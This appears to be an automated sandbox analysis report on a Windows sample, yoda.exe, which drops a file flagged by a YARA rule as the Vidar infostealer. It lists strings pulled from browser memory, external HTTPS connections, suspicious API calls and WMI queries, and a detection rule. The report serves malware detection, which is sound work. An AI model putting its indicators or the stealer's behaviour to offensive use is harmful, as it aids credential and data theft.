                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.c
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googlP6x
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2131394674.0000027800480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 0000000F.00000002.2214996441.0000027800358000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                Source: chrome.exe, 0000000F.00000002.2214915433.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2145015465.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2143157721.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2141719403.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2149899649.000002780033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2146745669.000002780033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: chrome.exe, 0000000F.00000002.2217256670.0000027800990000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                Source: chrome.exe, 0000000F.00000002.2217971807.0000027800BB4000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icogles
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/1
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/4
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/E
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/H
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/O
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/R
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Y
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/c
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/f
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hjH
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/m
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/w
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/z
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2229371938.000004480078C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2128289627.000004480039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2128101489.0000044800390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                Source: chrome.exe, 0000000F.00000003.2128509381.0000044800684000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2213890186.000002780000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 0000000F.00000002.2214548315.00000278001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 0000000F.00000002.2215981147.000002780065C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: UAS0ZU.10.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: chrome.exe, 0000000F.00000003.2141908830.00000278003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218195430.0000027800C14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: Iceland.com, 0000000A.00000002.2868954389.000000000375C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215589639.00000278004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2217762686.0000027800B30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2215785880.00000278005A8000.00000004.00000800.00020000.00000000.sdmp, 5PZUK6.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 0000000F.00000002.2216564416.000002780077C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
                Source: chrome.exe, 0000000F.00000002.2218115098.0000027800BE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoresent.
                Source: chrome.exe, 0000000F.00000002.2215275180.000002780040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2187446169.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 0000000F.00000003.2150029671.0000027801098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 0000000F.00000002.2217511194.0000027800A6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 0000000F.00000002.2213890186.000002780000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 0000000F.00000003.2180173191.0000027802A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 0000000F.00000003.2176587588.000002780280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 0000000F.00000002.2214614364.000002780020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 0000000F.00000002.2215325030.0000027800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 0000000F.00000002.2215325030.0000027800468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 0000000F.00000002.2215484730.00000278004AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 0000000F.00000003.2185016501.0000027803018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000003.2184000571.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184338732.0000027803074000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2188193381.00000278013D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2226828883.0000027803020000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2188149298.0000027802FDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2187446169.0000027802FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2185016501.0000027803018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 0000000F.00000002.2226784989.000002780300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 0000000F.00000002.2226784989.000002780300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2184264324.0000027802F8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Iceland.com, 0000000A.00000002.2873502548.00000000065BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 0000000F.00000002.2216489695.0000027800771000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2214811051.00000278002C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A9F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,10_2_00A9F7C7
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A9F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,10_2_00A9F55C
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00AB9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_00AB9FD2

                System Summary

                Source: 10.2.Iceland.com.3970000.1.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A3FFE0 CloseHandle,NtProtectVirtualMemory,10_2_00A3FFE0
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A94763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,10_2_00A94763
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A81B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00A81B4D
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A8F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,10_2_00A8F20D
                Source: C:\Users\user\Desktop\yoda.exe File created: C:\Windows\PerformerNextel
                Source: C:\Users\user\Desktop\yoda.exe File created: C:\Windows\ConsequenceCoalition
                Source: C:\Users\user\Desktop\yoda.exe File created: C:\Windows\PhilipsFavors
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: String function: 00A3FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: String function: 00A40DA0 appears 46 times
                Source: C:\Users\user\Desktop\yoda.exe Code function: String function: 004062CF appears 58 times
                Source: yoda.exe Static PE information: invalid certificate
                Source: yoda.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 10.2.Iceland.com.3970000.1.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: 2NG4E3.10.drBinary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@43/47@5/6
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A941FA GetLastError,FormatMessageW,10_2_00A941FA
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A82010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00A82010
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A81A0B AdjustTokenPrivileges,CloseHandle,10_2_00A81A0B
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A8DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00A8DD87
                Source: C:\Users\user\Desktop\yoda.exe Code function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com Code function: 10_2_00A93A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,10_2_00A93A0E
                Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HNGTT57S.htm
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                Source: C:\Users\user\Desktop\yoda.exe File created: C:\Users\user\AppData\Local\Temp\nsm6564.tmp
                Source: yoda.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\yoda.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\yoda.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: chrome.exe, 0000000F.00000002.2217452713.0000027800A1C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT id,url,visit_time,from_visit,external_referrer_url,transition,segment_id,visit_duration,incremented_omnibox_typed_score,opener_visit,originator_cache_guid,originator_visit_id,originator_from_visit,originator_opener_visit,is_known_to_sync,consider_for_ntp_most_visited FROM visits WHERE visit_time>=? AND visit_time<? ORDER BY visit_time DESC, id DESCALUE:2};
                Source: chrome.exe, 0000000F.00000002.2216169540.00000278006DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
